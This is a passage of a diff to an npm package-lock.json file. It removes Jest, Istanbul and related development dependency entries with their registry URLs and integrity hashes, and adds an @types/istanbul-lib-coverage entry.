- "integrity": "sha512-cTIB4yPYL/Grw0EaSzASzg6bBy9gqCofvWN8okThAYIxKJZC+udlRAmGbM0XLeniEJSs8uEgHPGuHSe1XsOLSQ==", - "dev": true - }, - "is-number": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", - "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", - "dev": true - }, - "is-stream": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/is-stream/-/is-stream-2.0.1.tgz", - "integrity": "sha512-hFoiJiTl63nn+kstHGBtewWSKnQLpyb155KHheA1l39uvtO9nWIop1p3udqPcUd/xbF1VLMO4n7OI6p7RbngDg==", - "dev": true - }, - "isexe": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", - "integrity": "sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==", - "dev": true - }, - "istanbul-lib-coverage": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/istanbul-lib-coverage/-/istanbul-lib-coverage-3.2.0.tgz", - "integrity": "sha512-eOeJ5BHCmHYvQK7xt9GkdHuzuCGS1Y6g9Gvnx3Ym33fz/HpLRYxiS0wHNr+m/MBC8B647Xt608vCDEvhl9c6Mw==", - "dev": true - }, - "istanbul-lib-instrument": { - "version": "5.2.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-5.2.1.tgz", - "integrity": "sha512-pzqtp31nLv/XFOzXGuvhCb8qhjmTVo5vjVk19XE4CRlSWz0KoeJ3bw9XsA7nOp9YBf4qHjwBxkDzKcME/J29Yg==", - "dev": true, - "requires": { - "@babel/core": "^7.12.3", - "@babel/parser": "^7.14.7", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-coverage": "^3.2.0", - "semver": "^6.3.0" - } - }, - "istanbul-lib-report": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-wcdi+uAKzfiGT2abPpKZ0hSU1rGQjUQnLvtY5MpQ7QCTahD3VODhcu4wcfY1YtkGaDD5yuydOLINXsfbus9ROw==", - "dev": true, - "requires": { - "istanbul-lib-coverage": "^3.0.0", - "make-dir": "^3.0.0", - "supports-color": "^7.1.0" - } - }, - "istanbul-lib-source-maps": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-source-maps/-/istanbul-lib-source-maps-4.0.1.tgz", - "integrity": "sha512-n3s8EwkdFIJCG3BPKBYvskgXGoy88ARzvegkitk60NxRdwltLOTaH7CUiMRXvwYorl0Q712iEjcWB+fK/MrWVw==", - "dev": true, - "requires": { - "debug": "^4.1.1", - "istanbul-lib-coverage": "^3.0.0", - "source-map": "^0.6.1" - } - }, - "istanbul-reports": { - "version": "3.1.5", - "resolved": "https://registry.npmjs.org/istanbul-reports/-/istanbul-reports-3.1.5.tgz", - "integrity": "sha512-nUsEMa9pBt/NOHqbcbeJEgqIlY/K7rVWUX6Lql2orY5e9roQOthbR3vtY4zzf2orPELg80fnxxk9zUyPlgwD1w==", - "dev": true, - "requires": { - "html-escaper": "^2.0.0", - "istanbul-lib-report": "^3.0.0" - } - }, - "jest": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest/-/jest-29.6.1.tgz", - "integrity": "sha512-Nirw5B4nn69rVUZtemCQhwxOBhm0nsp3hmtF4rzCeWD7BkjAXRIji7xWQfnTNbz9g0aVsBX6aZK3n+23LM6uDw==", - "dev": true, - "requires": { - "@jest/core": "^29.6.1", - "@jest/types": "^29.6.1", - "import-local": "^3.0.2", - "jest-cli": "^29.6.1" - } - }, - "jest-changed-files": { - "version": "29.5.0", - "resolved": "https://registry.npmjs.org/jest-changed-files/-/jest-changed-files-29.5.0.tgz", - "integrity": "sha512-IFG34IUMUaNBIxjQXF/iu7g6EcdMrGRRxaUSw92I/2g2YC6vCdTltl4nHvt7Ci5nSJwXIkCu8Ka1DKF+X7Z1Ag==", - "dev": true, - "requires": { - "execa": "^5.0.0", - "p-limit": "^3.1.0" - } - }, - "jest-circus": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-circus/-/jest-circus-29.6.1.tgz", - "integrity": "sha512-tPbYLEiBU4MYAL2XoZme/bgfUeotpDBd81lgHLCbDZZFaGmECk0b+/xejPFtmiBP87GgP/y4jplcRpbH+fgCzQ==", - "dev": true, - "requires": { - "@jest/environment": "^29.6.1", - "@jest/expect": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "co": "^4.6.0", - "dedent": "^0.7.0", - "is-generator-fn": "^2.0.0", - "jest-each": "^29.6.1", - "jest-matcher-utils": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-runtime": "^29.6.1", - "jest-snapshot": "^29.6.1", - "jest-util": "^29.6.1", - "p-limit": "^3.1.0", - "pretty-format": "^29.6.1", - "pure-rand": "^6.0.0", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - } - }, - "jest-cli": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-cli/-/jest-cli-29.6.1.tgz", - "integrity": "sha512-607dSgTA4ODIN6go9w6xY3EYkyPFGicx51a69H7yfvt7lN53xNswEVLovq+E77VsTRi5fWprLH0yl4DJgE8Ing==", - "dev": true, - "requires": { - "@jest/core": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/types": "^29.6.1", - "chalk": "^4.0.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "import-local": "^3.0.2", - "jest-config": "^29.6.1", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "prompts": "^2.0.1", - "yargs": "^17.3.1" - } - }, - "jest-config": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-config/-/jest-config-29.6.1.tgz", - "integrity": "sha512-XdjYV2fy2xYixUiV2Wc54t3Z4oxYPAELUzWnV6+mcbq0rh742X2p52pii5A3oeRzYjLnQxCsZmp0qpI6klE2cQ==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@jest/test-sequencer": "^29.6.1", - "@jest/types": "^29.6.1", - "babel-jest": "^29.6.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "deepmerge": "^4.2.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-circus": "^29.6.1", - "jest-environment-node": "^29.6.1", - "jest-get-type": "^29.4.3", - "jest-regex-util": "^29.4.3", - "jest-resolve": "^29.6.1", - "jest-runner": "^29.6.1", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "micromatch": "^4.0.4", - "parse-json": "^5.2.0", - "pretty-format": "^29.6.1", - "slash": "^3.0.0", - "strip-json-comments": "^3.1.1" - } - }, - "jest-diff": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-29.6.1.tgz", - "integrity": "sha512-FsNCvinvl8oVxpNLttNQX7FAq7vR+gMDGj90tiP7siWw1UdakWUGqrylpsYrpvj908IYckm5Y0Q7azNAozU1Kg==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "diff-sequences": "^29.4.3", - "jest-get-type": "^29.4.3", - "pretty-format": "^29.6.1" - } - }, - "jest-docblock": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/jest-docblock/-/jest-docblock-29.4.3.tgz", - "integrity": "sha512-fzdTftThczeSD9nZ3fzA/4KkHtnmllawWrXO69vtI+L9WjEIuXWs4AmyME7lN5hU7dB0sHhuPfcKofRsUb/2Fg==", - "dev": true, - "requires": { - "detect-newline": "^3.0.0" - } - }, - "jest-each": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-each/-/jest-each-29.6.1.tgz", - "integrity": "sha512-n5eoj5eiTHpKQCAVcNTT7DRqeUmJ01hsAL0Q1SMiBHcBcvTKDELixQOGMCpqhbIuTcfC4kMfSnpmDqRgRJcLNQ==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "chalk": "^4.0.0", - "jest-get-type": "^29.4.3", - "jest-util": "^29.6.1", - "pretty-format": "^29.6.1" - } - }, - "jest-environment-node": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-environment-node/-/jest-environment-node-29.6.1.tgz", - "integrity": "sha512-ZNIfAiE+foBog24W+2caIldl4Irh8Lx1PUhg/GZ0odM1d/h2qORAsejiFc7zb+SEmYPn1yDZzEDSU5PmDkmVLQ==", - "dev": true, - "requires": { - "@jest/environment": "^29.6.1", - "@jest/fake-timers": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "jest-mock": "^29.6.1", - "jest-util": "^29.6.1" - } - }, - "jest-get-type": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.4.3.tgz", - "integrity": "sha512-J5Xez4nRRMjk8emnTpWrlkyb9pfRQQanDrvWHhsR1+VUfbwxi30eVcZFlcdGInRibU4G5LwHXpI7IRHU0CY+gg==", - "dev": true - }, - "jest-haste-map": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.6.1.tgz", - "integrity": "sha512-0m7f9PZXxOCk1gRACiVgX85knUKPKLPg4oRCjLoqIm9brTHXaorMA0JpmtmVkQiT8nmXyIVoZd/nnH1cfC33ig==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "fsevents": "^2.3.2", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.4.3", - "jest-util": "^29.6.1", - "jest-worker": "^29.6.1", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - } - }, - "jest-leak-detector": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-leak-detector/-/jest-leak-detector-29.6.1.tgz", - "integrity": "sha512-OrxMNyZirpOEwkF3UHnIkAiZbtkBWiye+hhBweCHkVbCgyEy71Mwbb5zgeTNYWJBi1qgDVfPC1IwO9dVEeTLwQ==", - "dev": true, - "requires": { - "jest-get-type": "^29.4.3", - "pretty-format": "^29.6.1" - } - }, - "jest-matcher-utils": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-29.6.1.tgz", - "integrity": "sha512-SLaztw9d2mfQQKHmJXKM0HCbl2PPVld/t9Xa6P9sgiExijviSp7TnZZpw2Fpt+OI3nwUO/slJbOfzfUMKKC5QA==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "jest-diff": "^29.6.1", - "jest-get-type": "^29.4.3", - "pretty-format": "^29.6.1" - } - }, - "jest-message-util": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-29.6.1.tgz", - "integrity": "sha512-KoAW2zAmNSd3Gk88uJ56qXUWbFk787QKmjjJVOjtGFmmGSZgDBrlIL4AfQw1xyMYPNVD7dNInfIbur9B2rd/wQ==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.12.13", - "@jest/types": "^29.6.1", - "@types/stack-utils": "^2.0.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "micromatch": "^4.0.4", - "pretty-format": "^29.6.1", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - } - }, - "jest-mock": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-29.6.1.tgz", - "integrity": "sha512-brovyV9HBkjXAEdRooaTQK42n8usKoSRR3gihzUpYeV/vwqgSoNfrksO7UfSACnPmxasO/8TmHM3w9Hp3G1dgw==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "@types/node": "*", - "jest-util": "^29.6.1" - } - }, - "jest-pnp-resolver": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/jest-pnp-resolver/-/jest-pnp-resolver-1.2.3.tgz", - "integrity": "sha512-+3NpwQEnRoIBtx4fyhblQDPgJI0H1IEIkX7ShLUjPGA7TtUTvI1oiKi3SR4oBR0hQhQR80l4WAe5RrXBwWMA8w==", - "dev": true, - "requires": {} - }, - "jest-regex-util": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.4.3.tgz", - "integrity": "sha512-O4FglZaMmWXbGHSQInfXewIsd1LMn9p3ZXB/6r4FOkyhX2/iP/soMG98jGvk/A3HAN78+5VWcBGO0BJAPRh4kg==", - "dev": true - }, - "jest-resolve": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-resolve/-/jest-resolve-29.6.1.tgz", - "integrity": "sha512-AeRkyS8g37UyJiP9w3mmI/VXU/q8l/IH52vj/cDAyScDcemRbSBhfX/NMYIGilQgSVwsjxrCHf3XJu4f+lxCMg==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "jest-pnp-resolver": "^1.2.2", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "resolve": "^1.20.0", - "resolve.exports": "^2.0.0", - "slash": "^3.0.0" - } - }, - "jest-resolve-dependencies": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-resolve-dependencies/-/jest-resolve-dependencies-29.6.1.tgz", - "integrity": "sha512-BbFvxLXtcldaFOhNMXmHRWx1nXQO5LoXiKSGQcA1LxxirYceZT6ch8KTE1bK3X31TNG/JbkI7OkS/ABexVahiw==", - "dev": true, - "requires": { - "jest-regex-util": "^29.4.3", - "jest-snapshot": "^29.6.1" - } - }, - "jest-runner": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-runner/-/jest-runner-29.6.1.tgz", - "integrity": "sha512-tw0wb2Q9yhjAQ2w8rHRDxteryyIck7gIzQE4Reu3JuOBpGp96xWgF0nY8MDdejzrLCZKDcp8JlZrBN/EtkQvPQ==", - "dev": true, - "requires": { - "@jest/console": "^29.6.1", - "@jest/environment": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "graceful-fs": "^4.2.9", - "jest-docblock": "^29.4.3", - "jest-environment-node": "^29.6.1", - "jest-haste-map": "^29.6.1", - "jest-leak-detector": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-resolve": "^29.6.1", - "jest-runtime": "^29.6.1", - "jest-util": "^29.6.1", - "jest-watcher": "^29.6.1", - "jest-worker": "^29.6.1", - "p-limit": "^3.1.0", - "source-map-support": "0.5.13" - } - }, - "jest-runtime": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-runtime/-/jest-runtime-29.6.1.tgz", - "integrity": "sha512-D6/AYOA+Lhs5e5il8+5pSLemjtJezUr+8zx+Sn8xlmOux3XOqx4d8l/2udBea8CRPqqrzhsKUsN/gBDE/IcaPQ==", - "dev": true, - "requires": { - "@jest/environment": "^29.6.1", - "@jest/fake-timers": "^29.6.1", - "@jest/globals": "^29.6.1", - "@jest/source-map": "^29.6.0", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "cjs-module-lexer": "^1.0.0", - "collect-v8-coverage": "^1.0.0", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-mock": "^29.6.1", - "jest-regex-util": "^29.4.3", - "jest-resolve": "^29.6.1", - "jest-snapshot": "^29.6.1", - "jest-util": "^29.6.1", - "slash": "^3.0.0", - "strip-bom": "^4.0.0" - } - }, - "jest-snapshot": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-snapshot/-/jest-snapshot-29.6.1.tgz", - "integrity": "sha512-G4UQE1QQ6OaCgfY+A0uR1W2AY0tGXUPQpoUClhWHq1Xdnx1H6JOrC2nH5lqnOEqaDgbHFgIwZ7bNq24HpB180A==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@babel/generator": "^7.7.2", - "@babel/plugin-syntax-jsx": "^7.7.2", - "@babel/plugin-syntax-typescript": "^7.7.2", - "@babel/types": "^7.3.3", - "@jest/expect-utils": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/prettier": "^2.1.5", - "babel-preset-current-node-syntax": "^1.0.0", - "chalk": "^4.0.0", - "expect": "^29.6.1", - "graceful-fs": "^4.2.9", - "jest-diff": "^29.6.1", - "jest-get-type": "^29.4.3", - "jest-matcher-utils": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1", - "natural-compare": "^1.4.0", - "pretty-format": "^29.6.1", - "semver": "^7.5.3" - }, - "dependencies": { - "lru-cache": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", - "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", - "dev": true, - "requires": { - "yallist": "^4.0.0" - } - }, - "semver": { - "version": "7.5.4", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", - "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", - "dev": true, - "requires": { - "lru-cache": "^6.0.0" - } - }, - "yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", - "dev": true - } - } - }, - "jest-util": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-29.6.1.tgz", - "integrity": "sha512-NRFCcjc+/uO3ijUVyNOQJluf8PtGCe/W6cix36+M3cTFgiYqFOOW5MgN4JOOcvbUhcKTYVd1CvHz/LWi8d16Mg==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "graceful-fs": "^4.2.9", - "picomatch": "^2.2.3" - } - }, - "jest-validate": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-validate/-/jest-validate-29.6.1.tgz", - "integrity": "sha512-r3Ds69/0KCN4vx4sYAbGL1EVpZ7MSS0vLmd3gV78O+NAx3PDQQukRU5hNHPXlyqCgFY8XUk7EuTMLugh0KzahA==", - "dev": true, - "requires": { - "@jest/types": "^29.6.1", - "camelcase": "^6.2.0", - "chalk": "^4.0.0", - "jest-get-type": "^29.4.3", - "leven": "^3.1.0", - "pretty-format": "^29.6.1" - }, - "dependencies": { - "camelcase": { - "version": "6.3.0", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-6.3.0.tgz", - "integrity": "sha512-Gmy6FhYlCY7uOElZUSbxo2UCDH8owEk996gkbrpsgGtrJLM3J7jGxl9Ic7Qwwj4ivOE5AWZWRMecDdF7hqGjFA==", - "dev": true - } - } - }, - "jest-watcher": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-watcher/-/jest-watcher-29.6.1.tgz", - "integrity": "sha512-d4wpjWTS7HEZPaaj8m36QiaP856JthRZkrgcIY/7ISoUWPIillrXM23WPboZVLbiwZBt4/qn2Jke84Sla6JhFA==", - "dev": true, - "requires": { - "@jest/test-result": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "jest-util": "^29.6.1", - "string-length": "^4.0.1" - } - }, - "jest-worker": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.6.1.tgz", - "integrity": "sha512-U+Wrbca7S8ZAxAe9L6nb6g8kPdia5hj32Puu5iOqBCMTMWFHXuK6dOV2IFrpedbTV8fjMFLdWNttQTBL6u2MRA==", - "dev": true, - "requires": { - "@types/node": "*", - "jest-util": "^29.6.1", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - }, - "dependencies": { - "supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "requires": { - "has-flag": "^4.0.0" - } - } - } - }, - "js-tokens": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", - "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==", - "dev": true - }, - "js-yaml": { - "version": "3.14.1", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-3.14.1.tgz", - "integrity": "sha512-okMH7OXXJ7YrN9Ok3/SXrnu4iX9yOk+25nqX4imS2npuvTYDmo/QEZoqwZkYaIDk3jVvBOTOIEgEhaLOynBS9g==", - "dev": true, - "requires": { - "argparse": "^1.0.7", - "esprima": "^4.0.0" - } - }, - "jsesc": { - "version": "2.5.2", - "resolved": "https://registry.npmjs.org/jsesc/-/jsesc-2.5.2.tgz", - "integrity": "sha512-OYu7XEzjkCQ3C5Ps3QIZsQfNpqoJyZZA99wd9aWd05NCtC5pWOkShK2mkL6HXQR6/Cy2lbNdPlZBpuQHXE63gA==", - "dev": true - }, - "json-parse-even-better-errors": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/json-parse-even-better-errors/-/json-parse-even-better-errors-2.3.1.tgz", - "integrity": "sha512-xyFwyhro/JEof6Ghe2iz2NcXoj2sloNsWr/XsERDK/oiPCfaNhl5ONfp+jQdAZRQQ0IJWNzH9zIZF7li91kh2w==", - "dev": true - }, - "json5": { - "version": "2.2.3", - "resolved": "https://registry.npmjs.org/json5/-/json5-2.2.3.tgz", - "integrity": "sha512-XmOWe7eyHYH14cLdVPoyg+GOH3rYX++KpzrylJwSW98t3Nk+U8XOl8FWKOgwtzdb8lXGf6zYwDUzeHMWfxasyg==", - "dev": true - }, - "kleur": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/kleur/-/kleur-3.0.3.tgz", - "integrity": "sha512-eTIzlVOSUR+JxdDFepEYcBMtZ9Qqdef+rnzWdRZuMbOywu5tO2w2N7rqjoANZ5k9vywhL6Br1VRjUIgTQx4E8w==", - "dev": true - }, - "leven": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/leven/-/leven-3.1.0.tgz", - "integrity": "sha512-qsda+H8jTaUaN/x5vzW2rzc+8Rw4TAQ/4KjB46IwK5VH+IlVeeeje/EoZRpiXvIqjFgK84QffqPztGI3VBLG1A==", - "dev": true - }, - "lines-and-columns": { - "version": "1.2.4", - "resolved": "https://registry.npmjs.org/lines-and-columns/-/lines-and-columns-1.2.4.tgz", - "integrity": "sha512-7ylylesZQ/PV29jhEDl3Ufjo6ZX7gCqJr5F7PKrqc93v7fzSymt1BpwEU8nAUXs8qzzvqhbjhK5QZg6Mt/HkBg==", - "dev": true - }, - "locate-path": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz", - "integrity": "sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g==", - "dev": true, - "requires": { - "p-locate": "^4.1.0" - } - }, - "lodash.set": { - "version": "4.3.2", - "resolved": "https://registry.npmjs.org/lodash.set/-/lodash.set-4.3.2.tgz", - "integrity": "sha512-4hNPN5jlm/N/HLMCO43v8BXKq9Z7QdAGc/VGrRD61w8gN9g/6jF9A4L1pbUgBLCffi0w9VsXfTOij5x8iTyFvg==" - }, - "lru-cache": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-5.1.1.tgz", - "integrity": "sha512-KpNARQA3Iwv+jTA0utUVVbrh+Jlrr1Fv0e56GGzAFOXN7dk/FviaDW8LHmK52DlcH4WP2n6gI8vN1aesBFgo9w==", - "dev": true, - "requires": { - "yallist": "^3.0.2" - } - }, - "make-dir": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/make-dir/-/make-dir-3.1.0.tgz", - "integrity": "sha512-g3FeP20LNwhALb/6Cz6Dd4F2ngze0jz7tbzrD2wAV+o9FeNHe4rL+yK2md0J/fiSf1sa1ADhXqi5+oVwOM/eGw==", - "dev": true, - "requires": { - "semver": "^6.0.0" - } - }, - "makeerror": { - "version": "1.0.12", - "resolved": "https://registry.npmjs.org/makeerror/-/makeerror-1.0.12.tgz", - "integrity": "sha512-JmqCvUhmt43madlpFzG4BQzG2Z3m6tvQDNKdClZnO3VbIudJYmxsT0FNJMeiB2+JTSlTQTSbU8QdesVmwJcmLg==", - "dev": true, - "requires": { - "tmpl": "1.0.5" - } - }, - "merge-stream": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/merge-stream/-/merge-stream-2.0.0.tgz", - "integrity": "sha512-abv/qOcuPfk3URPfDzmZU1LKmuw8kT+0nIHvKrKgFrwifol/doWcdA4ZqsWQ8ENrFKkd67Mfpo/LovbIUsbt3w==", - "dev": true - }, - "micromatch": { - "version": "4.0.5", - "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.5.tgz", - "integrity": "sha512-DMy+ERcEW2q8Z2Po+WNXuw3c5YaUSFjAO5GsJqfEl7UjvtIuFKO6ZrKvcItdy98dwFI2N1tg3zNIdKaQT+aNdA==", - "dev": true, - "requires": { - "braces": "^3.0.2", - "picomatch": "^2.3.1" - } - }, - "mimic-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/mimic-fn/-/mimic-fn-2.1.0.tgz", - "integrity": "sha512-OqbOk5oEQeAZ8WXWydlu9HJjz9WVdEIvamMCcXmuqUYjTknH/sqsWvhQ3vgwKFRR1HpjvNBKQ37nbJgYzGqGcg==", - "dev": true - }, - "minimatch": { - "version": "3.1.2", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", - "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", - "dev": true, - "requires": { - "brace-expansion": "^1.1.7" - } - }, - "ms": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", - "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", - "dev": true - }, - "natural-compare": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/natural-compare/-/natural-compare-1.4.0.tgz", - "integrity": "sha512-OWND8ei3VtNC9h7V60qff3SVobHr996CTwgxubgyQYEpg290h9J0buyECNNJexkFm5sOajh5G116RYA1c8ZMSw==", - "dev": true - }, - "node-int64": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/node-int64/-/node-int64-0.4.0.tgz", - "integrity": "sha512-O5lz91xSOeoXP6DulyHfllpq+Eg00MWitZIbtPfoSEvqIHdl5gfcY6hYzDWnj0qD5tz52PI08u9qUvSVeUBeHw==", - "dev": true - }, - "node-releases": { - "version": "2.0.13", - "resolved": "https://registry.npmjs.org/node-releases/-/node-releases-2.0.13.tgz", - "integrity": "sha512-uYr7J37ae/ORWdZeQ1xxMJe3NtdmqMC/JZK+geofDrkLUApKRHPd18/TxtBOJ4A0/+uUIliorNrfYV6s1b02eQ==", - "dev": true - }, - "normalize-path": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/normalize-path/-/normalize-path-3.0.0.tgz", - "integrity": "sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA==", - "dev": true - }, - "npm-run-path": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/npm-run-path/-/npm-run-path-4.0.1.tgz", - "integrity": "sha512-S48WzZW777zhNIrn7gxOlISNAqi9ZC/uQFnRdbeIHhZhCA6UqpkOT8T1G7BvfdgP4Er8gF4sUbaS0i7QvIfCWw==", - "dev": true, - "requires": { - "path-key": "^3.0.0" - } - }, - "once": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", - "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", - "dev": true, - "requires": { - "wrappy": "1" - } + "@types/istanbul-lib-coverage": { + "version": "2.0.6", + "resolved": "https://registry.npmjs.org/@types/istanbul-lib-coverage/-/istanbul-lib-coverage-2.0.6.tgz", + "integrity": "sha512-2QF/t/auWm0lsy8XtKVPG19v3sSOQlJe/YHZgfjb/KBBHOGSV+J2q/S671rcq9uTBrLAXmZpqJiaQbMT+zNU1w==", + "dev": true }, - "onetime": { - "version": "5.1.2", - "resolved": 